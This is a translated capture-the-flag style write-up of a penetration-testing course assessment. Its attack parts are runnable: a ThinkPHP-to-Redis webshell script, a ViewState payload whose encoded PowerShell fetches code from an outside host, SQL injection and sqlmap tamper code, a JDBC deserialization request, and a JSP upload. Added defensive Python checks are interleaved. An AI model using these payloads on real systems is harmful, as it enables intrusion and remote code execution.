暗月 (Anyue) Penetration Testing Year-End Assessment Walkthrough

admin, 2024-03-08 09:12:13, 34 views, 10,378 characters, reading time 34 min 35 s

Disclaimer: the text and information provided by this public account are for learning and research only and must not be used for any illegal purpose. We strongly condemn any illegal activity and strictly comply with laws and regulations. Readers must obey the law and must not use the information provided here for any illegal activity. This public account accepts no responsibility for any unlawful conduct by readers.

Background

This year 暗月 released many tutorials, such as Java code auditing, .NET code auditing and PHP code auditing.

At year end it was time for a major assessment. Its purpose is to test how well students have learned, let them discover their own weaknesses during the assessment, and study more purposefully afterwards.

Assessment content

The assessment uses an online range: three servers and four FLAGs in total; capturing all of them means passing.

The focus is chaining multiple vulnerabilities to gain an external foothold, testing the ability both to find vulnerabilities and to exploit them.

The main content covers Java, .NET and PHP code auditing, assessing mastery of web security, plus Linux and Windows privilege escalation.

The whole assessment is black-box: find vulnerabilities, exploit them, and clear every stage.

Pass rate

100 people took the assessment and 8 passed, a pass rate of 8%, in line with expectations.

Below is the writeup (WP) of one student who passed.

ThinkPHP

Reference: https://xz.aliyun.com/t/7594

Redis cache

A value that begins with think_serialize: is deserialized when it is fetched with get, so it triggers unserialize.

Script writing process
First, bitwise-invert the generated deserialization payload (the inversion prevents errors during transmission). Because GET requests have a length limit, send it in segments and keep appending them with Redis's APPEND command; once everything has been appended, invert it again with BITOP NOT to obtain the complete serialized data.

The one-click exploitation script is below.
The deserialization PoC can be generated with phpggc.

<?php  

// eval 1 > payload123123.php
$a= "think_serialize:";
$a = $a."O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A5%3A%7Bs%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A8%3A%22%00%2A%00error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A3%3A%7Bs%3A15%3A%22%00%2A%00selfRelation%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00query%22%3BO%3A14%3A%22think%5Cdb%5CQuery%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00model%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A27%3A%22think%5Ccache%5Cdriver%5CMemcache%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A10%3A%22%00%2A%00handler%22%3BO%3A13%3A%22think%5CRequest%22%3A2%3A%7Bs%3A6%3A%22%00%2A%00get%22%3Ba%3A1%3A%7Bs%3A18%3A%22HEXENS%3CgetAttr%3Eno%3C%22%3Bs%3A53%3A%22echo+%22%3C%3Fphp+%40eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22+%3E+payload123123.php%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A7%3A%7Bs%3A4%3A%22host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22port%22%3Bi%3A11211%3Bs%3A6%3A%22expire%22%3Bi%3A3600%3Bs%3A7%3A%22timeout%22%3Bi%3A0%3Bs%3A12%3A%22session_name%22%3Bs%3A6%3A%22HEXENS%22%3Bs%3A8%3A%22username%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22password%22%3Bs%3A0%3A%22%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7D%7Ds%3A11%3A%22%00%2A%00bindAttr%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A2%3A%22no%22%3Bi%3A1%3Bs%3A3%3A%22123%22%3B%7D%7Ds%3A9%3A%22%00%2A%00parent%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5CO
utput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A27%3A%22think%5Ccache%5Cdriver%5CMemcache%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A10%3A%22%00%2A%00handler%22%3BO%3A13%3A%22think%5CRequest%22%3A2%3A%7Bs%3A6%3A%22%00%2A%00get%22%3Ba%3A1%3A%7Bs%3A18%3A%22HEXENS%3CgetAttr%3Eno%3C%22%3Bs%3A53%3A%22echo+%22%3C%3Fphp+%40eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22+%3E+payload123123.php%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A7%3A%7Bs%3A4%3A%22host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22port%22%3Bi%3A11211%3Bs%3A6%3A%22expire%22%3Bi%3A3600%3Bs%3A7%3A%22timeout%22%3Bi%3A0%3Bs%3A12%3A%22session_name%22%3Bs%3A6%3A%22HEXENS%22%3Bs%3A8%3A%22username%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22password%22%3Bs%3A0%3A%22%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7Ds%3A15%3A%22%00%2A%00selfRelation%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00query%22%3BO%3A14%3A%22think%5Cdb%5CQuery%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00model%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A27%3A%22think%5Ccache%5Cdriver%5CMemcache%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A10%3A%22%00%2A%00handler%22%3BO%3A13%3A%22think%5CRequest%22%3A2%3A%7Bs%3A6%3A%22%00%2A%00get%22%3Ba%3A1%3A%7Bs%3A18%3A%22HEXENS%3CgetAttr%3Eno%3C%22%3Bs%3A53%3A%22echo+%22%3C%
3Fphp+%40eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22+%3E+payload123123.php%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A7%3A%7Bs%3A4%3A%22host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22port%22%3Bi%3A11211%3Bs%3A6%3A%22expire%22%3Bi%3A3600%3Bs%3A7%3A%22timeout%22%3Bi%3A0%3Bs%3A12%3A%22session_name%22%3Bs%3A6%3A%22HEXENS%22%3Bs%3A8%3A%22username%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22password%22%3Bs%3A0%3A%22%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7D%7D%7D%7D%7D";

$originalString = urldecode($a);
$reversedString = '';

for ($i = 0; $i < strlen($originalString); $i++) {
$reversedString .= $originalString[$i] ^ "xFF";
}
$length = ceil(strlen($reversedString) / 10);

$segments = str_split($reversedString, $length);
$tmp_key = bin2hex(random_bytes(8));
$redis_ip = "127.0.0.1";
$server_ip = "103.164.63.172:8081";

$url = "http://$server_ip/public/index.php?s=index/Index/geturl&url=dict://$redis_ip:6379/config:set:slave-read-only:no";
echo file_get_contents($url);
foreach ($segments as $value)
{
$url = "http://$server_ip/public/index.php?s=index/Index/geturl&url=dict://$redis_ip:6379/APPEND:$tmp_key:".$value;
echo file_get_contents($url);
}
$url = "http://$server_ip/public/index.php?s=index/Index/geturl&url=dict://$redis_ip:6379/bitop:not:payload12xx123:$tmp_key";
echo file_get_contents($url);

echo file_get_contents("http://$server_ip/public/index.php?s=index/Index/getname&name=payload12xx123");

echo "webshell:npass:1nhttp://$server_ip/public/payload123123.php";

?>

The flag can be found in the root directory.
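The chain above only works because the geturl action will open any scheme (dict://) to any host (the local Redis on 127.0.0.1:6379). As an added hardening example for the defending side (not code from the writeup), this Python validator restricts what a fetch-by-URL endpoint may reach; the allowlists and sample URLs are constructed here, and literal-IP hosts are used so the check runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed policy: http/https, default web ports, public addresses only.
# Hostnames are refused so the check works offline; a real deployment resolves
# the name and re-checks every returned address before connecting.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

def check_outbound_url(url: str) -> tuple[bool, str]:
    """Return (allowed, reason) for a URL the server is asked to fetch."""
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError as exc:
        return False, f"unparseable url: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in url"
    if port is None:
        port = 443 if parts.scheme.lower() == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        addr = ipaddress.ip_address(parts.hostname)
    except ValueError:
        return False, "hostnames must be resolved and every address re-checked"
    if not addr.is_global:
        return False, f"non-public address {addr}"
    return True, "ok"

# Constructed samples; the first is the Redis request the script above sends
SAMPLES = [
    "dict://127.0.0.1:6379/config:set:slave-read-only:no",
    "http://127.0.0.1:6379/",
    "http://10.0.0.5/",
    "https://93.184.216.34/",
]
```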

Meeting booking system

http://103.164.63.231/login.aspx is a meeting booking system.

Front-end ViewState deserialization

References:
https://blog.csdn.net/qq_41891666/article/details/107290131
https://www.websecuritys.cn/index.php/archives/94/

Its hidden fields can be observed on login.aspx.

After reading up on the technique, it turned out that ysoserial.net can attack it directly.
Running ./ysoserial.exe -p ViewState also prints the common usage.

Combined with the web.config from the source downloaded online, which supplies the decryptionKey and validationKey, the whole payload can be constructed:

./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEANwA1AC4AMQA3ADgALgA3ADMALgAxADQAMQA6ADgAMAAxADEALwBhADEAMQAxACcAKQApACIA" --path="/login.aspx" --apppath="/" -decryptionkey="215D97F766DE50E575496E01C16306C751376E2EBBDE4B51" -validationkey="0BF11533BC55065E2C46C2F295FC5A501A13B28FE43B6F56E57973D4BE818354D21B7102EC24DB26B803D65936A5F1D812158D8F729406C168FC8440B4CDE16B"   --islegacy

It then came online directly;
after a potato privilege escalation the flag can be found under administrator.
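The forgery above needed nothing more than the validationKey and decryptionKey from a web.config that shipped with publicly downloadable source. As an added audit helper for the defending side (not from the writeup), this Python flags a web.config whose machineKey is a literal value instead of AutoGenerate, or whose ViewState MAC is disabled; the sample configs and key values are constructed placeholders.

```python
import xml.etree.ElementTree as ET

def audit_web_config(xml_text: str) -> list[str]:
    """Return findings to act on before the config is committed or deployed."""
    findings = []
    root = ET.fromstring(xml_text)
    for mk in root.iter("machineKey"):
        for attr in ("validationKey", "decryptionKey"):
            # A literal key in a file that reaches a repository is a leak waiting to happen
            if not mk.get(attr, "AutoGenerate").startswith("AutoGenerate"):
                findings.append(f"machineKey {attr} is a literal: rotate it and keep it out of source control")
    for pages in root.iter("pages"):
        if pages.get("enableViewStateMac", "true").lower() == "false":
            findings.append("enableViewStateMac=false: ViewState can be forged without any key")
    return findings

# Constructed samples; the key values are placeholders, not real keys
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="PLACEHOLDER_VALIDATION_KEY"
                decryptionKey="PLACEHOLDER_DECRYPTION_KEY"
                validation="SHA1" decryption="AES" />
    <pages enableViewStateMac="false" />
  </system.web>
</configuration>"""

SAFE_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" decryption="AES" />
    <pages enableViewStateMac="true" />
  </system.web>
</configuration>"""
```

On a web farm the keys cannot be AutoGenerate, but they still belong in a protected configuration store rather than in the files that get published with the application.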

Front-end injection point 1

Here the incoming dt parameter is not filtered at all; closing it with ') triggers SQL injection.
Exploitation:

http://103.164.63.231/report/data_list.aspx?dt=2024-01-27%27);waitfor delay '0:0:5'--

Stacked queries can be used directly.

Front-end injection point 2

This point takes its value from a cookie and first runs it through Helper.SimpleDecryptStr, a simple decryption.

That turns out to be a simple string transformation, so a tamper script makes the injection straightforward.
The script:

from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from urllib.parse import quote

__priority__ = PRIORITY.LOWEST


def dependencies():
    singleTimeWarnMessage("此脚本仅适用于 book_meeting")


def simple_encrypt_str(rs):
    # Inverse of Helper.SimpleDecryptStr: shift every character up by one, then reverse the string
    by = [ord(char) + 1 for char in rs]
    encrypted_str = ''.join(chr(byte) for byte in reversed(by))
    return encrypted_str


def tamper(payload, **kwargs):
    if not payload:
        return payload
    return quote(simple_encrypt_str(payload))

sqlmap -u "http://103.164.63.231/wx/AutoLogin_Qywx.aspx" --level 3 --cookie="qywxusername=1" -p qywxusername --tamper=book_meeting_AutoLogin_Qywx.py --ignore-redirects --skip-urlencode
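Injection points 1 and 2 both come down to a value (the dt parameter, the obfuscated qywxusername cookie) reaching SQL unchanged. As an added example for the detection side (not part of the writeup), this Python reconstructs Helper.SimpleDecryptStr from the description above (reverse, then shift each character back by one) so an analyst can decode captured cookies and flag the ones carrying SQL; the cookie header, marker list and samples are constructed here.

```python
from urllib.parse import quote, unquote

# Reconstructed from the description above: the "encryption" is a reversal plus
# a one-code-point shift. encrypt is what the tamper script does; decrypt is what
# Helper.SimpleDecryptStr does server-side before the value reaches the query.
def simple_encrypt_str(plain: str) -> str:
    return "".join(chr(ord(c) + 1) for c in reversed(plain))

def simple_decrypt_str(enc: str) -> str:
    return "".join(chr(ord(c) - 1) for c in reversed(enc))

# Substrings that do not belong in a username (constructed list)
SQL_MARKERS = ("'", ";", "--", "waitfor", "xp_cmdshell", "/*")

def triage_cookie(cookie_header: str, name: str = "qywxusername") -> dict:
    """Extract one cookie from a raw Cookie header, undo the obfuscation and
    report whether the recovered value looks like SQL rather than a username."""
    value = None
    for part in cookie_header.split(";"):
        key, _, raw = part.strip().partition("=")
        if key == name:
            value = unquote(raw)
            break
    if value is None:
        return {"found": False}
    decoded = simple_decrypt_str(value)
    hits = [m for m in SQL_MARKERS if m in decoded.lower()]
    return {"found": True, "decoded": decoded, "suspicious": bool(hits), "markers": hits}

# Constructed samples: the dt payload from injection point 1, wrapped the way the
# tamper script above would send it in the qywxusername cookie, and a benign login
SAMPLE_INJECTION = "1');waitfor delay '0:0:5'--"
SAMPLE_COOKIE = "JSESSIONID=abc123; qywxusername=" + quote(simple_encrypt_str(SAMPLE_INJECTION))
SAMPLE_BENIGN = "qywxusername=" + quote(simple_encrypt_str("zhangsan"))
```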

Front-end injection point 3

This location is the same as the previous one: the incoming value goes through the same simple encryption, and exploitation is identical to the above. It is located at

/dd/AutoLogin.aspx

Separate web and database servers

Because stacked injection exists, xp_cmdshell can execute system commands directly, and sqlmap --os-shell does it in one step.
Then bring the host online in CS; the flag can be found under users.

CBoard

http://103.164.63.172:8090
The default credentials admin / root123 get into the backend.

JDBC reverse shell

From the source obtained on GitHub, the pom.xml tells us the database version, and CC6 is very likely usable; build the evil server with the project https://github.com/fnmsd/MySQL_Fake_Server.

The final raw HTTP request is:

POST /dashboard/test.do HTTP/1.1
Host: 103.164.63.172:8090
Content-Length: 403
Accept: application/json, text/plain, */*
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://39.101.184.7:8026
Referer: http://39.101.184.7:8026/cboard/starter.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,vi;q=0.7
Cookie: JSESSIONID=351888835121736C4B575BE0B49F2DDA
Connection: close

datasource=%7B%22config%22%3A%7B%22pooled%22%3Atrue%2C%22driver%22%3A%22com.mysql.jdbc.Driver%22%2C%22jdbcurl%22%3A%22jdbc%3Amysql%3A%2F%2F175.178.73.141%3A3306%2Ftest%3FautoDeserialize%3Dtrue%26user%3Dbase64ZGVzZXJfQ0MzMV9pZA%3D%3D%22%2C%22username%22%3A%22CommonsCollections6%22%2C%22password%22%3A%22123456%22%7D%2C%22type%22%3A%22jdbc%22%2C%22name%22%3A%22test%22%7D&query=%7B%22sql%22%3A%221%22%7D

Backend arbitrary file upload

There is another spot that allows arbitrary file upload.

As the source above shows, the whole upload process is plain string concatenation with no handling of the file extension at all. The target middleware is Tomcat, so an arbitrary JSP webshell can be uploaded to take control of the site.

Raw HTTP request:

POST /dashboard/uploadImage.do HTTP/1.1
Host: 103.164.63.172:8090
Pragma: no-cache
Cache-Control: no-cache
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,vi;q=0.7
Cookie: JSESSIONID=FBC699B01EC74F0154B6ECF2EF00953B
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY32jx5xlw76vxXzj
Content-Length: 181

------WebKitFormBoundaryY32jx5xlw76vxXzj
Content-Disposition: form-data; name="file"; filename="2.jsp"
Content-Type: image/png

1
------WebKitFormBoundaryY32jx5xlw76vxXzj--

Finally, the full concatenated path can be found in the source:

http://103.164.63.172:8090/imgs/cockpit/upload/20240128104846/2.jsp
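The upload request above sends filename="2.jsp" with Content-Type: image/png and a one-byte body, and the handler concatenated the name into the path unchanged. As an added server-side check (not CBoard's code), this Python applies three independent tests (bare name, extension allowlist, content magic bytes), each of which rejects that request on its own; the allowed types and sample inputs are constructed here.

```python
import posixpath
import secrets

# Allowed extensions and the magic bytes a real file of that type starts with
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

def validate_image_upload(filename: str, content_type: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for one multipart file part."""
    # Reject anything that is not a bare file name: separators, traversal, NUL
    base = posixpath.basename(filename.replace("\\", "/"))
    if base != filename or base in ("", ".", "..") or "\x00" in filename:
        return False, "filename must be a plain name without path components"
    root, ext = posixpath.splitext(base)
    ext = ext.lower()
    if not root or ext not in ALLOWED_TYPES:
        return False, f"extension {ext or '(none)'} not allowed"
    # The declared type is client-controlled, so it is a necessary but not sufficient check
    if not content_type.lower().startswith("image/"):
        return False, "content-type is not an image"
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "file content does not match extension"
    return True, "ok"

def stored_name(ext: str) -> str:
    """Never reuse the client's name on disk; generate one with a vetted extension."""
    if ext not in ALLOWED_TYPES:
        raise ValueError(ext)
    return secrets.token_hex(8) + ext

PNG_SAMPLE = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"  # constructed header bytes
```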


Originally published on the WeChat public account 实战安全研究. Reposted by CN-SEC 中文网, original link: http://cn-sec.com/archives/2551254.html
